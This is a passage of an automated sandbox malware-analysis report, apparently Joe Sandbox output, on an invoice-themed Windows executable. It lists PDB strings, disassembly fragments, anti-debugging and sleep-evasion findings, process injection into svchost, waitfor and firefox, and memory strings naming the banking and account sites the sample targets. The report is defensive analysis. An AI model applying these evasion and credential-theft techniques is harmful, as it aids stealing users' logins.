                Source: Proforma invoice - Arancia NZ.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: waitfor.pdbGCTL source: svchost.exe, 00000002.00000003.2264065169.0000000002C1A000.00000004.00000020.00020000.00000000.sdmp, nfGtWoQBhJSQ.exe, 00000004.00000002.4468779110.0000000001238000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: waitfor.pdb source: svchost.exe, 00000002.00000003.2264065169.0000000002C1A000.00000004.00000020.00020000.00000000.sdmp, nfGtWoQBhJSQ.exe, 00000004.00000002.4468779110.0000000001238000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: nfGtWoQBhJSQ.exe, 00000004.00000002.4468208625.000000000003E000.00000002.00000001.01000000.00000005.sdmp, nfGtWoQBhJSQ.exe, 00000006.00000000.2371266085.000000000003E000.00000002.00000001.01000000.00000005.sdmp
                Source: Binary string: wntdll.pdbUGP source: Proforma invoice - Arancia NZ.exe, 00000000.00000003.2010896437.0000000003730000.00000004.00001000.00020000.00000000.sdmp, Proforma invoice - Arancia NZ.exe, 00000000.00000003.2011131820.0000000003590000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2205330195.0000000003100000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2297091430.0000000003300000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2297091430.000000000349E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2203022832.0000000002F00000.00000004.00000020.00020000.00000000.sdmp, waitfor.exe, 00000005.00000002.4469911093.0000000004A7E000.00000040.00001000.00020000.00000000.sdmp, waitfor.exe, 00000005.00000003.2297008372.000000000457A000.00000004.00000020.00020000.00000000.sdmp, waitfor.exe, 00000005.00000003.2307765954.000000000472C000.00000004.00000020.00020000.00000000.sdmp, waitfor.exe, 00000005.00000002.4469911093.00000000048E0000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: Proforma invoice - Arancia NZ.exe, 00000000.00000003.2010896437.0000000003730000.00000004.00001000.00020000.00000000.sdmp, Proforma invoice - Arancia NZ.exe, 00000000.00000003.2011131820.0000000003590000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.2205330195.0000000003100000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2297091430.0000000003300000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2297091430.000000000349E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2203022832.0000000002F00000.00000004.00000020.00020000.00000000.sdmp, waitfor.exe, 00000005.00000002.4469911093.0000000004A7E000.00000040.00001000.00020000.00000000.sdmp, waitfor.exe, 00000005.00000003.2297008372.000000000457A000.00000004.00000020.00020000.00000000.sdmp, waitfor.exe, 00000005.00000003.2307765954.000000000472C000.00000004.00000020.00020000.00000000.sdmp, waitfor.exe, 00000005.00000002.4469911093.00000000048E0000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: svchost.pdb source: waitfor.exe, 00000005.00000002.4470341771.0000000004F0C000.00000004.10000000.00040000.00000000.sdmp, waitfor.exe, 00000005.00000002.4468568240.0000000000A46000.00000004.00000020.00020000.00000000.sdmp, nfGtWoQBhJSQ.exe, 00000006.00000002.4469771241.00000000025EC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2596011160.000000003A8DC000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: svchost.pdbUGP source: waitfor.exe, 00000005.00000002.4470341771.0000000004F0C000.00000004.10000000.00040000.00000000.sdmp, waitfor.exe, 00000005.00000002.4468568240.0000000000A46000.00000004.00000020.00020000.00000000.sdmp, nfGtWoQBhJSQ.exe, 00000006.00000002.4469771241.00000000025EC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2596011160.000000003A8DC000.00000004.80000000.00040000.00000000.sdmp
                Source: Proforma invoice - Arancia NZ.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                Source: Proforma invoice - Arancia NZ.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                Source: Proforma invoice - Arancia NZ.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                Source: Proforma invoice - Arancia NZ.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                Source: Proforma invoice - Arancia NZ.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                Source: C:\Users\user\Desktop\Proforma invoice - Arancia NZ.exeCode function: 0_2_00254B37 LoadLibraryA,GetProcAddress,0_2_00254B37
                Source: C:\Users\user\Desktop\Proforma invoice - Arancia NZ.exeCode function: 0_2_00278945 push ecx; ret 0_2_00278958
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041F993 push edi; iretd 2_2_0041F99F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041A218 push ebp; ret 2_2_0041A219
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00405CA0 push ds; iretd 2_2_00405CA1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00403580 push eax; ret 2_2_00403582
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00416E2A push esp; iretd 2_2_00416E2B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00419764 push ebp; ret 2_2_004197A3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004167F3 push FFFFFFBEh; retf 2_2_0041683D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033309AD push ecx; mov dword ptr [esp], ecx2_2_033309B6
                Source: C:\Program Files (x86)\URykIbKWWDMlJUeLUYouEVrRBahEEyKRfOYKTHZTrAMfOQpBsbPgMhnbTlcDGzMLxvFo\nfGtWoQBhJSQ.exeCode function: 4_2_032C0B6E push ecx; retf 4_2_032C0B6F
                Source: C:\Program Files (x86)\URykIbKWWDMlJUeLUYouEVrRBahEEyKRfOYKTHZTrAMfOQpBsbPgMhnbTlcDGzMLxvFo\nfGtWoQBhJSQ.exeCode function: 4_2_032C3B8E push ebp; ret 4_2_032C3BCD
                Source: C:\Program Files (x86)\URykIbKWWDMlJUeLUYouEVrRBahEEyKRfOYKTHZTrAMfOQpBsbPgMhnbTlcDGzMLxvFo\nfGtWoQBhJSQ.exeCode function: 4_2_032C1254 push esp; iretd 4_2_032C1255
                Source: C:\Program Files (x86)\URykIbKWWDMlJUeLUYouEVrRBahEEyKRfOYKTHZTrAMfOQpBsbPgMhnbTlcDGzMLxvFo\nfGtWoQBhJSQ.exeCode function: 4_2_032B00CA push ds; iretd 4_2_032B00CB
                Source: C:\Program Files (x86)\URykIbKWWDMlJUeLUYouEVrRBahEEyKRfOYKTHZTrAMfOQpBsbPgMhnbTlcDGzMLxvFo\nfGtWoQBhJSQ.exeCode function: 4_2_032C4642 push ebp; ret 4_2_032C4643
                Source: C:\Program Files (x86)\URykIbKWWDMlJUeLUYouEVrRBahEEyKRfOYKTHZTrAMfOQpBsbPgMhnbTlcDGzMLxvFo\nfGtWoQBhJSQ.exeCode function: 4_2_032C9DAF push edi; iretd 4_2_032C9DC9
                Source: C:\Program Files (x86)\URykIbKWWDMlJUeLUYouEVrRBahEEyKRfOYKTHZTrAMfOQpBsbPgMhnbTlcDGzMLxvFo\nfGtWoQBhJSQ.exeCode function: 4_2_032C0C1D push FFFFFFBEh; retf 4_2_032C0C67
                Source: C:\Program Files (x86)\URykIbKWWDMlJUeLUYouEVrRBahEEyKRfOYKTHZTrAMfOQpBsbPgMhnbTlcDGzMLxvFo\nfGtWoQBhJSQ.exeCode function: 4_2_032C0C1B push FFFFFFBEh; retf 4_2_032C0C67
                Source: C:\Users\user\Desktop\Proforma invoice - Arancia NZ.exeCode function: 0_2_002548D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_002548D7
                Source: C:\Users\user\Desktop\Proforma invoice - Arancia NZ.exeCode function: 0_2_002D5376 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_002D5376
                Source: C:\Users\user\Desktop\Proforma invoice - Arancia NZ.exeCode function: 0_2_00273187 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00273187
                Source: C:\Users\user\Desktop\Proforma invoice - Arancia NZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Proforma invoice - Arancia NZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\waitfor.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\waitfor.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\waitfor.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\waitfor.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\waitfor.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Switches to a custom stack to bypass stack traces
                Source: C:\Users\user\Desktop\Proforma invoice - Arancia NZ.exeAPI/Special instruction interceptor: Address: C530EC
                Source: C:\Windows\SysWOW64\waitfor.exeAPI/Special instruction interceptor: Address: 7FF8C88ED324
                Source: C:\Windows\SysWOW64\waitfor.exeAPI/Special instruction interceptor: Address: 7FF8C88ED7E4
                Source: C:\Windows\SysWOW64\waitfor.exeAPI/Special instruction interceptor: Address: 7FF8C88ED944
                Source: C:\Windows\SysWOW64\waitfor.exeAPI/Special instruction interceptor: Address: 7FF8C88ED504
                Source: C:\Windows\SysWOW64\waitfor.exeAPI/Special instruction interceptor: Address: 7FF8C88ED544
                Source: C:\Windows\SysWOW64\waitfor.exeAPI/Special instruction interceptor: Address: 7FF8C88ED1E4
                Source: C:\Windows\SysWOW64\waitfor.exeAPI/Special instruction interceptor: Address: 7FF8C88F0154
                Source: C:\Windows\SysWOW64\waitfor.exeAPI/Special instruction interceptor: Address: 7FF8C88EDA44
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0337096E rdtsc 2_2_0337096E
                Source: C:\Windows\SysWOW64\waitfor.exeWindow / User API: threadDelayed 5118Jump to behavior
                Source: C:\Windows\SysWOW64\waitfor.exeWindow / User API: threadDelayed 4855Jump to behavior
                Source: C:\Users\user\Desktop\Proforma invoice - Arancia NZ.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_0-102101
                Source: C:\Users\user\Desktop\Proforma invoice - Arancia NZ.exeAPI coverage: 4.4 %
                Source: C:\Windows\SysWOW64\svchost.exeAPI coverage: 0.8 %
                Source: C:\Windows\SysWOW64\waitfor.exe TID: 6128Thread sleep count: 5118 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\waitfor.exe TID: 6128Thread sleep time: -10236000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\waitfor.exe TID: 6128Thread sleep count: 4855 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\waitfor.exe TID: 6128Thread sleep time: -9710000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\URykIbKWWDMlJUeLUYouEVrRBahEEyKRfOYKTHZTrAMfOQpBsbPgMhnbTlcDGzMLxvFo\nfGtWoQBhJSQ.exe TID: 7064Thread sleep time: -70000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\URykIbKWWDMlJUeLUYouEVrRBahEEyKRfOYKTHZTrAMfOQpBsbPgMhnbTlcDGzMLxvFo\nfGtWoQBhJSQ.exe TID: 7064Thread sleep count: 36 > 30Jump to behavior
                Source: C:\Program Files (x86)\URykIbKWWDMlJUeLUYouEVrRBahEEyKRfOYKTHZTrAMfOQpBsbPgMhnbTlcDGzMLxvFo\nfGtWoQBhJSQ.exe TID: 7064Thread sleep time: -54000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\URykIbKWWDMlJUeLUYouEVrRBahEEyKRfOYKTHZTrAMfOQpBsbPgMhnbTlcDGzMLxvFo\nfGtWoQBhJSQ.exe TID: 7064Thread sleep count: 36 > 30Jump to behavior
                Source: C:\Program Files (x86)\URykIbKWWDMlJUeLUYouEVrRBahEEyKRfOYKTHZTrAMfOQpBsbPgMhnbTlcDGzMLxvFo\nfGtWoQBhJSQ.exe TID: 7064Thread sleep time: -36000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\waitfor.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\waitfor.exeLast function: Thread delayed
                Source: C:\Users\user\Desktop\Proforma invoice - Arancia NZ.exeCode function: 0_2_002B445A GetFileAttributesW,FindFirstFileW,FindClose,0_2_002B445A
                Source: C:\Users\user\Desktop\Proforma invoice - Arancia NZ.exeCode function: 0_2_002BC6D1 FindFirstFileW,FindClose,0_2_002BC6D1
                Source: C:\Users\user\Desktop\Proforma invoice - Arancia NZ.exeCode function: 0_2_002BC75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_002BC75C
                Source: C:\Users\user\Desktop\Proforma invoice - Arancia NZ.exeCode function: 0_2_002BEF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_002BEF95
                Source: C:\Users\user\Desktop\Proforma invoice - Arancia NZ.exeCode function: 0_2_002BF0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_002BF0F2
                Source: C:\Users\user\Desktop\Proforma invoice - Arancia NZ.exeCode function: 0_2_002BF3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_002BF3F3
                Source: C:\Users\user\Desktop\Proforma invoice - Arancia NZ.exeCode function: 0_2_002B37EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_002B37EF
                Source: C:\Users\user\Desktop\Proforma invoice - Arancia NZ.exeCode function: 0_2_002B3B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_002B3B12
                Source: C:\Users\user\Desktop\Proforma invoice - Arancia NZ.exeCode function: 0_2_002BBCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_002BBCBC
                Source: C:\Users\user\Desktop\Proforma invoice - Arancia NZ.exeCode function: 0_2_002549A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_002549A0
                Source: FxK39HI69.5.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
                Source: FxK39HI69.5.drBinary or memory string: discord.comVMware20,11696428655f
                Source: FxK39HI69.5.drBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
                Source: FxK39HI69.5.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
                Source: FxK39HI69.5.drBinary or memory string: global block list test formVMware20,11696428655
                Source: FxK39HI69.5.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
                Source: FxK39HI69.5.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
                Source: FxK39HI69.5.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
                Source: FxK39HI69.5.drBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
                Source: FxK39HI69.5.drBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
                Source: FxK39HI69.5.drBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
                Source: FxK39HI69.5.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
                Source: FxK39HI69.5.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
                Source: FxK39HI69.5.drBinary or memory string: outlook.office365.comVMware20,11696428655t
                Source: FxK39HI69.5.drBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
                Source: firefox.exe, 00000008.00000002.2597482429.000001FBFA7DE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll"
                Source: waitfor.exe, 00000005.00000002.4468568240.0000000000A46000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: FxK39HI69.5.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
                Source: FxK39HI69.5.drBinary or memory string: outlook.office.comVMware20,11696428655s
                Source: FxK39HI69.5.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
                Source: FxK39HI69.5.drBinary or memory string: ms.portal.azure.comVMware20,11696428655
                Source: FxK39HI69.5.drBinary or memory string: AMC password management pageVMware20,11696428655
                Source: FxK39HI69.5.drBinary or memory string: tasks.office.comVMware20,11696428655o
                Source: FxK39HI69.5.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
                Source: nfGtWoQBhJSQ.exe, 00000006.00000002.4469046244.00000000006BF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll<
                Source: FxK39HI69.5.drBinary or memory string: turbotax.intuit.comVMware20,11696428655t
                Source: FxK39HI69.5.drBinary or memory string: interactivebrokers.comVMware20,11696428655
                Source: FxK39HI69.5.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
                Source: FxK39HI69.5.drBinary or memory string: dev.azure.comVMware20,11696428655j
                Source: FxK39HI69.5.drBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
                Source: FxK39HI69.5.drBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
                Source: FxK39HI69.5.drBinary or memory string: bankofamerica.comVMware20,11696428655x
                Source: FxK39HI69.5.drBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
                Source: FxK39HI69.5.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
                Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\waitfor.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0337096E rdtsc 2_2_0337096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00418073 LdrLoadDll,2_2_00418073
                Source: C:\Users\user\Desktop\Proforma invoice - Arancia NZ.exeCode function: 0_2_002C3F09 BlockInput,0_2_002C3F09
                Source: C:\Users\user\Desktop\Proforma invoice - Arancia NZ.exeCode function: 0_2_00253B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00253B3A
                Source: C:\Users\user\Desktop\Proforma invoice - Arancia NZ.exeCode function: 0_2_00285A7C EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,0_2_00285A7C
                Source: C:\Users\user\Desktop\Proforma invoice - Arancia NZ.exeCode function: 0_2_00254B37 LoadLibraryA,GetProcAddress,0_2_00254B37
                Source: C:\Users\user\Desktop\Proforma invoice - Arancia NZ.exeCode function: 0_2_00C533B8 mov eax, dword ptr fs:[00000030h]0_2_00C533B8
                Source: C:\Users\user\Desktop\Proforma invoice - Arancia NZ.exeCode function: 0_2_00C53358 mov eax, dword ptr fs:[00000030h]0_2_00C53358
                Source: C:\Users\user\Desktop\Proforma invoice - Arancia NZ.exeCode function: 0_2_00C51D38 mov eax, dword ptr fs:[00000030h]0_2_00C51D38
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0332C310 mov ecx, dword ptr fs:[00000030h]2_2_0332C310
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03350310 mov ecx, dword ptr fs:[00000030h]2_2_03350310
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336A30B mov eax, dword ptr fs:[00000030h]2_2_0336A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336A30B mov eax, dword ptr fs:[00000030h]2_2_0336A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336A30B mov eax, dword ptr fs:[00000030h]2_2_0336A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033D437C mov eax, dword ptr fs:[00000030h]2_2_033D437C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B035C mov eax, dword ptr fs:[00000030h]2_2_033B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B035C mov eax, dword ptr fs:[00000030h]2_2_033B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B035C mov eax, dword ptr fs:[00000030h]2_2_033B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B035C mov ecx, dword ptr fs:[00000030h]2_2_033B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B035C mov eax, dword ptr fs:[00000030h]2_2_033B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B035C mov eax, dword ptr fs:[00000030h]2_2_033B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033FA352 mov eax, dword ptr fs:[00000030h]2_2_033FA352
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033D8350 mov ecx, dword ptr fs:[00000030h]2_2_033D8350
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B2349 mov eax, dword ptr fs:[00000030h]2_2_033B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B2349 mov eax, dword ptr fs:[00000030h]2_2_033B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B2349 mov eax, dword ptr fs:[00000030h]2_2_033B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B2349 mov eax, dword ptr fs:[00000030h]2_2_033B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B2349 mov eax, dword ptr fs:[00000030h]2_2_033B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B2349 mov eax, dword ptr fs:[00000030h]2_2_033B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B2349 mov eax, dword ptr fs:[00000030h]2_2_033B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B2349 mov eax, dword ptr fs:[00000030h]2_2_033B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B2349 mov eax, dword ptr fs:[00000030h]2_2_033B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B2349 mov eax, dword ptr fs:[00000030h]2_2_033B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B2349 mov eax, dword ptr fs:[00000030h]2_2_033B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B2349 mov eax, dword ptr fs:[00000030h]2_2_033B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B2349 mov eax, dword ptr fs:[00000030h]2_2_033B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B2349 mov eax, dword ptr fs:[00000030h]2_2_033B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B2349 mov eax, dword ptr fs:[00000030h]2_2_033B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03328397 mov eax, dword ptr fs:[00000030h]2_2_03328397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03328397 mov eax, dword ptr fs:[00000030h]2_2_03328397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03328397 mov eax, dword ptr fs:[00000030h]2_2_03328397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0332E388 mov eax, dword ptr fs:[00000030h]2_2_0332E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0332E388 mov eax, dword ptr fs:[00000030h]2_2_0332E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0332E388 mov eax, dword ptr fs:[00000030h]2_2_0332E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0335438F mov eax, dword ptr fs:[00000030h]2_2_0335438F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0335438F mov eax, dword ptr fs:[00000030h]2_2_0335438F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0334E3F0 mov eax, dword ptr fs:[00000030h]2_2_0334E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0334E3F0 mov eax, dword ptr fs:[00000030h]2_2_0334E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0334E3F0 mov eax, dword ptr fs:[00000030h]2_2_0334E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033663FF mov eax, dword ptr fs:[00000030h]2_2_033663FF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033403E9 mov eax, dword ptr fs:[00000030h]2_2_033403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033403E9 mov eax, dword ptr fs:[00000030h]2_2_033403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033403E9 mov eax, dword ptr fs:[00000030h]2_2_033403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033403E9 mov eax, dword ptr fs:[00000030h]2_2_033403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033403E9 mov eax, dword ptr fs:[00000030h]2_2_033403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033403E9 mov eax, dword ptr fs:[00000030h]2_2_033403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033403E9 mov eax, dword ptr fs:[00000030h]2_2_033403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033403E9 mov eax, dword ptr fs:[00000030h]2_2_033403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033DE3DB mov eax, dword ptr fs:[00000030h]2_2_033DE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033DE3DB mov eax, dword ptr fs:[00000030h]2_2_033DE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033DE3DB mov ecx, dword ptr fs:[00000030h]2_2_033DE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033DE3DB mov eax, dword ptr fs:[00000030h]2_2_033DE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033D43D4 mov eax, dword ptr fs:[00000030h]2_2_033D43D4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033D43D4 mov eax, dword ptr fs:[00000030h]2_2_033D43D4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033EC3CD mov eax, dword ptr fs:[00000030h]2_2_033EC3CD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0333A3C0 mov eax, dword ptr fs:[00000030h]2_2_0333A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0333A3C0 mov eax, dword ptr fs:[00000030h]2_2_0333A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0333A3C0 mov eax, dword ptr fs:[00000030h]2_2_0333A3C0
